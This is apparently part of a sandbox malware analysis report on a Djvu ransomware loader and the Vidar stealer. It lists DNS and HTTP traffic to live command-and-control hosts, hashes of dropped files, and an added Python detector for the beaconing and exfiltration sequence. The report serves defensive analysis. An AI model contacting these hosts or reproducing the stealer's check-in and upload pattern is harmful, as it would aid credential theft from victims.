    GET http://128.140.92.122:8081/files.zip

    HTTP Response

    200

    HTTP Request

    POST http://128.140.92.122:8081/

    HTTP Response

    200
  • 8.8.8.8:53
    126.50.247.8.in-addr.arpa
    dns
    71 B
    125 B
    1
    1

    DNS Request

    126.50.247.8.in-addr.arpa

  • 8.8.8.8:53
    2.136.104.51.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    2.136.104.51.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    api.2ip.ua
    dns
    c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
    56 B
    72 B
    1
    1

    DNS Request

    api.2ip.ua

    DNS Response

    162.0.217.254

  • 8.8.8.8:53
    254.217.0.162.in-addr.arpa
    dns
    72 B
    126 B
    1
    1

    DNS Request

    254.217.0.162.in-addr.arpa

  • 8.8.8.8:53
    101.14.18.104.in-addr.arpa
    dns
    72 B
    134 B
    1
    1

    DNS Request

    101.14.18.104.in-addr.arpa

  • 8.8.8.8:53
    101.15.18.104.in-addr.arpa
    dns
    72 B
    134 B
    1
    1

    DNS Request

    101.15.18.104.in-addr.arpa

  • 8.8.8.8:53
    208.194.73.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    208.194.73.20.in-addr.arpa

  • 8.8.8.8:53
    colisumy.com
    dns
    c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
    58 B
    218 B
    1
    1

    DNS Request

    colisumy.com

    DNS Response

    189.245.23.185
    211.171.233.126
    201.124.98.97
    123.140.161.243
    211.53.230.67
    220.82.134.215
    151.251.31.98
    154.182.153.162
    189.232.51.144
    80.210.25.252

  • 8.8.8.8:53
    zexeq.com
    dns
    c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
    55 B
    215 B
    1
    1

    DNS Request

    zexeq.com

    DNS Response

    196.188.169.138
    187.156.105.40
    109.175.29.39
    62.217.232.10
    201.119.15.212
    190.219.153.101
    190.187.52.42
    211.40.39.251
    211.171.233.129
    222.236.49.123

  • 8.8.8.8:53
    185.23.245.189.in-addr.arpa
    dns
    73 B
    131 B
    1
    1

    DNS Request

    185.23.245.189.in-addr.arpa

  • 8.8.8.8:53
    138.169.188.196.in-addr.arpa
    dns
    74 B
    135 B
    1
    1

    DNS Request

    138.169.188.196.in-addr.arpa

  • 8.8.8.8:53
    t.me
    dns
    build2.exe
    50 B
    66 B
    1
    1

    DNS Request

    t.me

    DNS Response

    149.154.167.99

  • 8.8.8.8:53
    99.167.154.149.in-addr.arpa
    dns
    73 B
    166 B
    1
    1

    DNS Request

    99.167.154.149.in-addr.arpa

  • 8.8.8.8:53
    22.249.124.192.in-addr.arpa
    dns
    73 B
    113 B
    1
    1

    DNS Request

    22.249.124.192.in-addr.arpa

  • 8.8.8.8:53
    122.92.140.128.in-addr.arpa
    dns
    73 B
    131 B
    1
    1

    DNS Request

    122.92.140.128.in-addr.arpa

  • 8.8.8.8:53
    56.126.166.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    56.126.166.20.in-addr.arpa

  • 8.8.8.8:53
    254.109.26.67.in-addr.arpa
    dns
    72 B
    126 B
    1
    1

    DNS Request

    254.109.26.67.in-addr.arpa

  • 8.8.8.8:53
    63.13.109.52.in-addr.arpa
    dns
    71 B
    145 B
    1
    1

    DNS Request

    63.13.109.52.in-addr.arpa

  • 8.8.8.8:53
    57.169.31.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    57.169.31.20.in-addr.arpa

  • 8.8.8.8:53
    202.74.101.95.in-addr.arpa
    dns
    72 B
    137 B
    1
    1

    DNS Request

    202.74.101.95.in-addr.arpa

  • 8.8.8.8:53
    5.173.189.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    5.173.189.20.in-addr.arpa
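
The Network section shows two distinct beaconing styles. The Djvu loader uses the bare user agent "Microsoft Internet Explorer" for its geo lookup, for the zexeq.com check-in (get.php?pid=<32 hex>&first=true) and for both payload downloads, while build2.exe (Vidar) first fetches the t.me profile that appears as its Botnet/C2 value and then, against 128.140.92.122:8081, requests a 32-hex-character path, downloads files.zip and sends a 157 kB multipart POST. The Python below is an added example, not part of the Triage report, that correlates these patterns over constructed proxy records modelled on the requests above (plus one benign browser request to t.me); the timestamps, the browser allow-list and the 100 kB upload threshold are assumptions made for the example.

```python
"""Proxy-log correlation for the beaconing patterns in the Network section (added example)."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

SAMPLE = "c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe"
VIDAR_UA = ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 "
            "(KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1788.0 uacq")
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}   # assumed allow-list
DEAD_DROP_HOSTS = {"t.me", "steamcommunity.com"}                          # from the Vidar config
DJVU_CHECKIN = re.compile(r"/get\.php\?pid=[0-9a-f]{32}&first=(?:true|false)$", re.I)
STAGE_PATH = re.compile(r"^/[0-9a-f]{32}$")
EXFIL_MIN_BYTES = 100_000          # assumed threshold for "large multipart POST"

# Constructed records: (seconds since start, process, method, url, user_agent, status, bytes_out).
RECORDS = [
    (0, SAMPLE, "GET", "https://api.2ip.ua/geo.json", "Microsoft Internet Explorer", 429, 0),
    (13, SAMPLE, "GET", "http://colisumy.com/dl/build2.exe", "Microsoft Internet Explorer", 200, 0),
    (13, SAMPLE, "GET", "http://zexeq.com/raud/get.php?pid=94E1BC88C047D2BC5A0CD5F3E0382D82&first=true",
     "Microsoft Internet Explorer", 200, 0),
    (16, SAMPLE, "GET", "http://zexeq.com/files/1/build3.exe", "Microsoft Internet Explorer", 200, 0),
    (18, "build2.exe", "GET", "https://t.me/eagl3z",
     "Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0", 200, 0),
    (18, "build2.exe", "GET", "http://128.140.92.122:8081/cbd613607c301b91658bcf8a9e38cc6a", VIDAR_UA, 200, 0),
    (18, "build2.exe", "GET", "http://128.140.92.122:8081/files.zip", VIDAR_UA, 200, 0),
    (26, "build2.exe", "POST", "http://128.140.92.122:8081/", VIDAR_UA, 200, 157337),
    (30, "chrome.exe", "GET", "https://t.me/somechannel", "Mozilla/5.0 (Windows NT 10.0) Chrome/114.0.0.0", 200, 0),
]


def analyze(records):
    """Return sorted, de-duplicated (process, finding, detail) triples."""
    findings = set()
    per_host = defaultdict(list)       # (process, host:port) -> [(method, path, bytes_out)] in time order
    for ts, proc, method, url, ua, status, bytes_out in sorted(records, key=lambda r: r[0]):
        u = urlsplit(url)
        path_q = u.path + ("?" + u.query if u.query else "")
        # 1. Djvu check-in: /get.php?pid=<32 hex victim token>&first=...
        if DJVU_CHECKIN.search(path_q):
            findings.add((proc, "djvu_c2_checkin", u.netloc))
        # 2. A version-less "Microsoft Internet Explorer" UA never comes from a real browser.
        if ua == "Microsoft Internet Explorer":
            findings.add((proc, "bare_ie_user_agent", u.netloc))
        # 3. Telegram/Steam profile pages fetched by something that is not a browser:
        #    Vidar reads its real C2 address from such a profile (dead-drop resolver).
        if u.hostname in DEAD_DROP_HOSTS and proc.lower() not in BROWSERS:
            findings.add((proc, "dead_drop_profile_fetch", url))
        per_host[(proc, u.netloc)].append((method, u.path, bytes_out))
    # 4. Per (process, host): GET /<32 hex> -> GET /files.zip -> large POST /, in that order.
    for (proc, host), reqs in per_host.items():
        stage = [i for i, (m, p, _) in enumerate(reqs) if m == "GET" and STAGE_PATH.match(p)]
        deps = [i for i, (m, p, _) in enumerate(reqs) if m == "GET" and p == "/files.zip"]
        post = [i for i, (m, p, b) in enumerate(reqs) if m == "POST" and p == "/" and b >= EXFIL_MIN_BYTES]
        if stage and deps and post and stage[0] < deps[0] < post[-1]:
            findings.add((proc, "vidar_c2_sequence", host))
    return sorted(findings)


if __name__ == "__main__":
    for proc, finding, detail in analyze(RECORDS):
        print(f"{finding:24} {proc:<70} {detail}")
```

The sequence rule is the most robust of the four because it does not depend on the user agent or on the C2 address, both of which change between Vidar builds; the dead-drop rule needs the browser allow-list tuned to the environment, and on a proxy that does not log the client process it degrades to a plain host match.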


Downloads

  • C:\ProgramData\mozglue.dll

    Filesize

    593KB

    MD5

    c8fd9be83bc728cc04beffafc2907fe9

    SHA1

    95ab9f701e0024cedfbd312bcfe4e726744c4f2e

    SHA256

    ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

    SHA512

    fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

  • C:\ProgramData\nss3.dll

    Filesize

    2.0MB

    MD5

    1cc453cdf74f31e4d913ff9c10acdde2

    SHA1

    6e85eae544d6e965f15fa5c39700fa7202f3aafe

    SHA256

    ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

    SHA512

    dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

    Filesize

    2KB

    MD5

    ec50490b07b4d77ae984e14377e81faf

    SHA1

    74330d98bc1ef271a37b3ae273efcccab1c335be

    SHA256

    30afe1a3bcc9efa0dd4619e272548ef4ecc76817e67e04f69cb83f1e4380d716

    SHA512

    3972532782f05f3d24f6e8e3ab8362dfc2603c24ffe5728404977b4d13f3dc360b76b6ab8056da98845f53d5d12d9d24981d0e6edcc042d0b885114417945c8f

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

    Filesize

    1KB

    MD5

    f232260646b9219a0d25be2ba7d3e80f

    SHA1

    748c809b09ab1d39ef17ec453428cbc2449ef7b9

    SHA256

    3217032d47b15ce1c91eb2dc77e765dd9acffb0029756f4dd02ab6c12e0bd65e

    SHA512

    6eb067b352e6920b2fb6981d37ea3e3f59e3b5725a4ca797c34463b6e52e0b9e748d0cf31496b54c989bf7126d55b40d44850b7122f4d9fee3593926c4c6fedb

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

    Filesize

    488B

    MD5

    434e5afc6b8fcaf32d4268bede602cd1

    SHA1

    f74138ecf0bce9599d7ac8d7bfb0a436903a3cca

    SHA256

    3473a4e3a33d9b6d4a1da18ce75c1f975888bd8cf690bbc691b9d9b0912dbfd4

    SHA512

    a9677ee281d03ab449ed55a023d8853c8d0b3e92a566fe8756655794d6c2e279d6015799b6b1446efabe39b2dcbeb5052e1c30b87f875b9bcefaad7bb42f5d14

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

    Filesize

    482B

    MD5

    30632de87da89c70541ff5d50c4f452f

    SHA1

    b39bf51fde8f2c78cfaafa080d9f59fac550784c

    SHA256

    3e57b2d2a3816c5404f830bf579d6ec00bc3713ea3be3d03b7410e5b0da0bd52

    SHA512

    4b784fe1914e327c891b916f9c551cb3f0325f08a6cdeb4796918fa80d981ef6e4df78ad8ede337ae280bc66e293f62338f2eee451f03918f3a9c3b3e08476e4

  • C:\Users\Admin\AppData\Local\211697e2-eae8-42ec-8785-08c77492616d\c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe

    Filesize

    812KB

    MD5

    73ecaf10be2b83a9a1e77d3235865eac

    SHA1

    3236e7d9b443a757dbc4dcf902d78c2f8dfaebed

    SHA256

    c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd

    SHA512

    b2c9df901501146d740c0449d3424f2782307463cb5743ca5d03db2714e6d0291d7c66b9b85c55ab4f14a975ae4da429218fbc3bf41cf2f9747a6f3aaca28988

  • C:\Users\Admin\AppData\Local\2204781c-229b-46c5-af25-4f4f30ce3f7b\build2.exe

    Filesize

    447KB

    MD5

    08819e55df0897a6dded1e5e6bf83601

    SHA1

    22d39992c6245b86ee8b14e0cc820e46a9094c45

    SHA256

    3dae32e22775721f2f9de5fec79dbcd8d62adaeb057b47c4524e02d130a43b25

    SHA512

    36ed6a07776139fbc4e1f4a90745633466ce40db8a374417cafc5846e3bd7277c56673dc98ef9b2379f286d3f0bacdce62e67f6b01fe177ed1dafa1065036b8b

  • C:\Users\Admin\AppData\Local\2204781c-229b-46c5-af25-4f4f30ce3f7b\build3.exe

    Filesize

    9KB

    MD5

    9ead10c08e72ae41921191f8db39bc16

    SHA1

    abe3bce01cd34afc88e2c838173f8c2bd0090ae1

    SHA256

    8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0

    SHA512

    aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

    Filesize

    9KB

    MD5

    9ead10c08e72ae41921191f8db39bc16

    SHA1

    abe3bce01cd34afc88e2c838173f8c2bd0090ae1

    SHA256

    8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0

    SHA512

    aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

  • memory/540-{136,137,138,139,148}-0x0000000000400000-0x0000000000537000-memory.dmp

    Filesize

    1.2MB (5 dumps of the same region in PID 540)

  • memory/908-{183,189,199,200,283,285,287,288}-0x0000000000400000-0x00000000004A1000-memory.dmp

    Filesize

    644KB (8 dumps of the same region in PID 908)

  • memory/908-210-0x0000000061E00000-0x0000000061EF3000-memory.dmp

    Filesize

    972KB

  • memory/1176-134-0x0000000002370000-0x000000000240A000-memory.dmp

    Filesize

    616KB

  • memory/1176-135-0x0000000002440000-0x000000000255B000-memory.dmp

    Filesize

    1.1MB

  • memory/3908-151-0x0000000002240000-0x00000000022DE000-memory.dmp

    Filesize

    632KB

  • memory/4596-182-0x0000000000750000-0x0000000000850000-memory.dmp

    Filesize

    1024KB

  • memory/4596-184-0x00000000020F0000-0x000000000217D000-memory.dmp

    Filesize

    564KB

  • memory/5008-{153,154,156,157,162,163,167,169,170,195,284}-0x0000000000400000-0x0000000000537000-memory.dmp

    Filesize

    1.2MB (11 dumps of the same region in PID 5008)
